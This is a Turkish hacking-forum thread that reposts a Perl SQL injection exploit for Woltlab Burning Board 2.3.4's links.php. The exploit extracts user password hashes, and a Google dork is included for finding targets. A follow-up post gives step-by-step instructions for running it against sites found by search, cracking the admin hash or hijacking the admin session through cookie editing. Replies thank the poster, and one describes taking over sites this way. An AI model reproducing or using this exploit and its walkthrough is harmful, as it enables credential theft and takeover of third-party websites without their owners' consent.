Burning Board 2.3.4

Neuromancer · 12 Şub 2007

Kod:

#!/usr/bin/perl

use IO::Socket;

print q{
################################################################################
##                                                                            ##
##  Woltlab Burning Board 2.3.4 <= "links.php" SQL Injection Exploit          ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##  Exploit by       |  666 (SR-Crew)                                         ##
##  Bug by           |  x82                                                   ##
##  Googledork       |  inurl:/wbb2/links.php?cat                             ##
##  Usage            |  links.pl [server] [path]                              ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##                                                                            ##
################################################################################

};

$webpage = $ARGV[0];
$directory = $ARGV[1];

if (!$webpage||!$directory) { die "[+] Exploit failed\n"; }

$wbb_dir = 
"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", 
PeerPort=>"80") || die "[+] Can't connect to Server\n";
print "[+] Exploiting....\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";

while ($answer = <$sock>) {
    if ($answer =~ 
/(................................)<\/span><\/b><\/font>/) {
        print "[+] Hash: $1\n";
        exit();
    }
    if ($answer =~ /SQL-DATABASE ERROR/) {
        break;
    }
}

$wbb_dir = 
"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";
close($sock);

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", 
PeerPort=>"80") || die "[+] Can't connect to Server\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";

while ($answer = <$sock>) {
    if ($answer =~ 
/(................................)<\/span><\/b><\/font>/) {
        print "[+] Hash: $1\n";
        exit();
    }
    if ($answer =~ /SQL-DATABASE ERROR/) {
        print "[+] Try replacing bb1_users with bb2_users\n";
        break;
    }
}
close($sock);

print "[+] Exploit failed\n";

# milw0rm.com [2006-05-20]

sauron90 · 29 Haz 2007

Kullanımı

Kodu Kopyalayın Not Defretine Yapmıştırın Adını Burning Uzantısını .PL Yapın

c:\perl\bin e atın

Sonra Başlat/Çalıştır/CMD Yazip Enter'a Basın

Sonra Aç Google'yi

Yaz Bunu Burning Board 2.3.4

Çıkan Sitelerden Birisini Seç

Sonra

cd..
cd..
cd perl
cd bin

Burning.pl www.bilmemnesitesi.com

Sonuç: Hash Ve Siteye 1. Üle Olanın Cookie Bilgilerini

Hash ı Kır Kıramassan Cookie Editor İle Sitenin Cookie Ayarlarını Exploitin Verdiği Cookie Bilgileri İle Değiştir Bu Kadar

hic_kimse · 7 Tem 2007

acıklamaya bakarsan bişi anlamadım c:/perl diye bişi yok

djalicee · 7 Tem 2007

işte budur brawo kankalar

chowzr · 12 Tem 2007

hic_kimse' Alıntı:
acıklamaya bakarsan bişi anlamadım c:/perl diye bişi yok

uah

uah google dan active perl download dıyıp perl ındr onu kur c ne perl gelcek sonrada exploit nedir nasıl kullanılır ve anatomisini bi arastrkendı soruna kendın cevap verıcen.. kolay gelsın

Neuromancer tesekkurler....

aksaray68 · 13 Tem 2007

çok saol kardeş bu yöntemi önceden kullanmıştın admin hashı çalarak siteyi ele geçiriyon güzel yöntem

BuRSaSpQRLu40258 · 17 Tem 2007

saol kanka pylaşım için eline sağlık

By_QkT@Y1 · 17 Tem 2007

sauron90' Alıntı:
Kullanımı

Kodu Kopyalayın Not Defretine Yapmıştırın Adını Burning Uzantısını .PL Yapın

c:\perl\bin e atın

Sonra Başlat/Çalıştır/CMD Yazip Enter'a Basın

Sonra Aç Google'yi

Yaz Bunu Burning Board 2.3.4

Çıkan Sitelerden Birisini Seç

Sonra

cd..
cd..
cd perl
cd bin

Burning.pl www.bilmemnesitesi.com

Sonuç: Hash Ve Siteye 1. Üle Olanın Cookie Bilgilerini

Hash ı Kır Kıramassan Cookie Editor İle Sitenin Cookie Ayarlarını Exploitin Verdiği Cookie Bilgileri İle Değiştir Bu Kadar

BİR Konu BÖyle Özentlenir İşte saol gardaş

jk_paris · 28 Tem 2007

teşekkürler eline saglıkk herşey olması gereken gıbı anlatılmıs bravo!!!!

JrH4ck3R · 29 Tem 2007

tşk paylaşım için

Anonymous · 30 Tem 2007

C/Perl dediği nedir?
active perl programını indir.Kur bu perl dilinde yazılmış exploitleri kullanmanız için yazılmış bir programdır.
videolu anlatımım olacak yarın koyarım

k-a-r-i-z-m-a · 30 Tem 2007

Sağol Paylaşim Için

jk_paris · 6 Ağu 2007

Teşekkürler

DUMAN_1987 · 7 Eyl 2007

Anonymous' Alıntı:
C/Perl dediği nedir?
active perl programını indir.Kur bu perl dilinde yazılmış exploitleri kullanmanız için yazılmış bir programdır.
videolu anlatımım olacak yarın koyarım

videoyu ne zaman koyacan arkadasım 4 gözle videoyu bekliyoruz...

TrMn · 8 Eki 2007

links.pl [server] [path]

Exploiting...
Exploit failed

acaba yolunda mı bi yanlışlık var ki ??

hadiama · 8 Eki 2007

TrMn' Alıntı:
links.pl [server] [path]

Exploiting...
Exploit failed

acaba yolunda mı bi yanlışlık var ki ??

evet bu exp nedense bende calıstıramadım

BySkandaL · 10 Eki 2007

Arkadaşlar aynen bu nokta benimde kafama takıldı .Anlamadım
[server] [path] ?

oscar.sandess · 16 Eki 2007

eLıne emegıne saGLık Kardes.

Burning Board 2.3.4

Neuromancer

Yeni üye

sauron90

Katılımcı Üye

hic_kimse

Yeni üye

djalicee

Üye

chowzr

Yeni üye

aksaray68

Katılımcı Üye

BuRSaSpQRLu40258

Uzman üye

By_QkT@Y1

Yeni üye

jk_paris

Yeni üye

JrH4ck3R

Üye

Anonymous

Katılımcı Üye

k-a-r-i-z-m-a

Yeni üye

jk_paris

Yeni üye

DUMAN_1987

Yeni üye

TrMn

Yeni üye

hadiama

Yeni üye

BySkandaL

Yeni üye

oscar.sandess

Yeni üye

Sosyal medya sayfalarımız